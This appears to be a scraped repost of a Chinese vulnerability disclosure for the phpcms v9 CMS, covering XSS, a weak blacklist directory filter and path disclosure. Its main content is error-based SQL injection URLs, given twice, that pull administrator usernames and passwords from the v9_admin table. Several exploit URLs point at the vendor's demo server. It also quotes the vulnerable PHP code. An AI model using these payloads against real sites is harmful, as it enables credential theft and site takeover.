phpcms v9 Multiple Vulnerabilities
2012-07-18 14:56
357 查看
hpcmsV9最新版SQL注射+XSS
XSS
利用方法:
http://localhost/phpcms/index.php?m=search&a=public_get_suggest_keyword&url=http://localhost/&q=1
新建一个名为&q=1的文件 写入 <script>alert(/Zvall/)</script>
黑名单过滤:这里只说过滤方式. 这里并没有权限访问
http://localhost/phpcms/index.php?m=attachment&a=album_dir&dir=.\.\ 用黑名单过滤始终是不可取的
路径泄露
没进行容错处理提交:
http://v9.demo.phpcms.cn/index.php?m=../model&c=member_group_model.class
由于member_group_model.class 类不存在 会报错
Fatal error: Class 'member_group_model.class' not found in /workspace/wwwroot/v9.demo.phpcms.cn/phpcms/libs/classes/application.class.php on
http://v9.demo.phpcms.cn/index.php?m=../../
Fatal error: Cannot redeclare timeinterval() (previously declared in /workspace/wwwroot/v9.demo.phpcms.cn/phpcms/libs/functions/autoload/info.func.php:15) in /workspace/wwwroot/v9.demo.phpcms.cn/phpcms/libs/functions/autoload/info.func.php on line 27
XSS:
SQL注入:
http://localhost/phpcms/index.php?a=list_type&c=index&m=link&siteid='+and(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,unhex(Hex(cast(v9_admin.username+as+char))),0x27,0x7e)+from+`phpcmsv9`.v9_admin+Order+by+userid+limit+0,1)+)+from+`information_schema`.tables+limit+0,1),floor(rand(0)*2))x+from+`information_schema`.tables+group+by+x)a)+and+'1'%3D'1
http://localhost/phpcms/index.php?a=list_type&c=index&m=link&siteid='+and(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,unhex(Hex(cast(v9_admin.password+as+char))),0x27,0x7e)+from+`phpcmsv9`.v9_admin+Order+by+userid+limit+0,1)+)+from+`information_schema`.tables+limit+0,1),floor(rand(0)*2))x+from+`information_schema`.tables+group+by+x)a)+and+'1'%3D'1
详细说明:
XSSpublic function public_get_suggest_keyword() { $url = $_GET['url'].'&q='.$_GET['q']; echo $url; $res = @file_get_contents($url); if(CHARSET != 'gbk') { $res = iconv('gbk', CHARSET, $res); } echo $res; }
利用方法:
http://localhost/phpcms/index.php?m=search&a=public_get_suggest_keyword&url=http://localhost/&q=1
新建一个名为&q=1的文件 写入 <script>alert(/Zvall/)</script>
黑名单过滤:这里只说过滤方式. 这里并没有权限访问
if(!$this->admin_username) return false; if($_GET['args']) extract(getswfinit($_GET['args'])); $dir = isset($_GET['dir']) && trim($_GET['dir']) ? str_replace(array('..\\', '../', './', '.\\','..'), '', trim($_GET['dir'])) : ''; $filepath = $this->upload_path.$dir; $list = glob($filepath.'/'.'*'); if(!empty($list)) rsort($list); $local = str_replace(array(PC_PATH, PHPCMS_PATH ,DIRECTORY_SEPARATOR.DIRECTORY_SEPARATOR), array('','',DIRECTORY_SEPARATOR), $filepath); $url = ($dir == '.' || $dir=='') ? $this->upload_url : $this->upload_url.str_replace('.', '', $dir).'/'; $show_header = true; include $this->admin_tpl('album_dir');
http://localhost/phpcms/index.php?m=attachment&a=album_dir&dir=.\.\ 用黑名单过滤始终是不可取的
路径泄露
if (empty($filename)) $filename = ROUTE_C; if (empty($m)) $m = ROUTE_M; $filepath = PC_PATH.'modules'.DIRECTORY_SEPARATOR.$m.DIRECTORY_SEPARATOR.$filename.'.php'; if (file_exists($filepath)) { $classname = $filename; include $filepath; if ($mypath = pc_base::my_path($filepath)) { $classname = 'MY_'.$filename; include $mypath; } return new $classname;
没进行容错处理提交:
http://v9.demo.phpcms.cn/index.php?m=../model&c=member_group_model.class
由于member_group_model.class 类不存在 会报错
Fatal error: Class 'member_group_model.class' not found in /workspace/wwwroot/v9.demo.phpcms.cn/phpcms/libs/classes/application.class.php on
http://v9.demo.phpcms.cn/index.php?m=../../
Fatal error: Cannot redeclare timeinterval() (previously declared in /workspace/wwwroot/v9.demo.phpcms.cn/phpcms/libs/functions/autoload/info.func.php:15) in /workspace/wwwroot/v9.demo.phpcms.cn/phpcms/libs/functions/autoload/info.func.php on line 27
漏洞证明:
XSS:SQL注入:
http://localhost/phpcms/index.php?a=list_type&c=index&m=link&siteid='+and(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,unhex(Hex(cast(v9_admin.username+as+char))),0x27,0x7e)+from+`phpcmsv9`.v9_admin+Order+by+userid+limit+0,1)+)+from+`information_schema`.tables+limit+0,1),floor(rand(0)*2))x+from+`information_schema`.tables+group+by+x)a)+and+'1'%3D'1
http://localhost/phpcms/index.php?a=list_type&c=index&m=link&siteid='+and(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,unhex(Hex(cast(v9_admin.password+as+char))),0x27,0x7e)+from+`phpcmsv9`.v9_admin+Order+by+userid+limit+0,1)+)+from+`information_schema`.tables+limit+0,1),floor(rand(0)*2))x+from+`information_schema`.tables+group+by+x)a)+and+'1'%3D'1
相关文章推荐
- Oracle July 2006 Security Update Multiple Vulnerabilities
- QQmail Multiple Xss Vulnerabilities
- Netrw Vim Script Multiple Command Execution Vulnerabilities
- Multiple vulnerabilities in XAMPP
- Multiple Vulnerabilities with 8.3 Filename Pseudonyms in Web Servers
- Multiple Adobe Products - XML External Entity And XML Injection Vulnerabilities
- Invision Power Board Multiple SQL Injection Vulnerabilities
- MySQL 'sql_parse.cc' Multiple Format String Vulnerabilities
- VigileCMS Multiple Vulnerabilities
- op5 Appliance Multiple Remote Command Execution Vulnerabilities
- Cacti Multiple Input Validation Security Vulnerabilities
- Vulnerabilities in SWFUpload in multiple web applications: WordPress, Dotclear, InstantCMS, AionWeb
- MySQL 'sql_parse.cc' Multiple Format String Vulnerabilities
- OSSIM 2.1 - Multiple security vulnerabilities
- TinyBrowser (TinyMCE Editor File browser) 1.41.6 - Multiple Vulnerabilities
- Multiple vulnerabilities in Cacti 0.8.8b and lower
- Vuln: Kaspersky Internet Security 6 SSDT Hooks Multiple Local Vulnerabilities
- Ipswitch IMAIL 11.01 multiple vulnerabilities (reversible encryption + weak ACL)
- Multiple critical vulnerabilities in Apache Struts2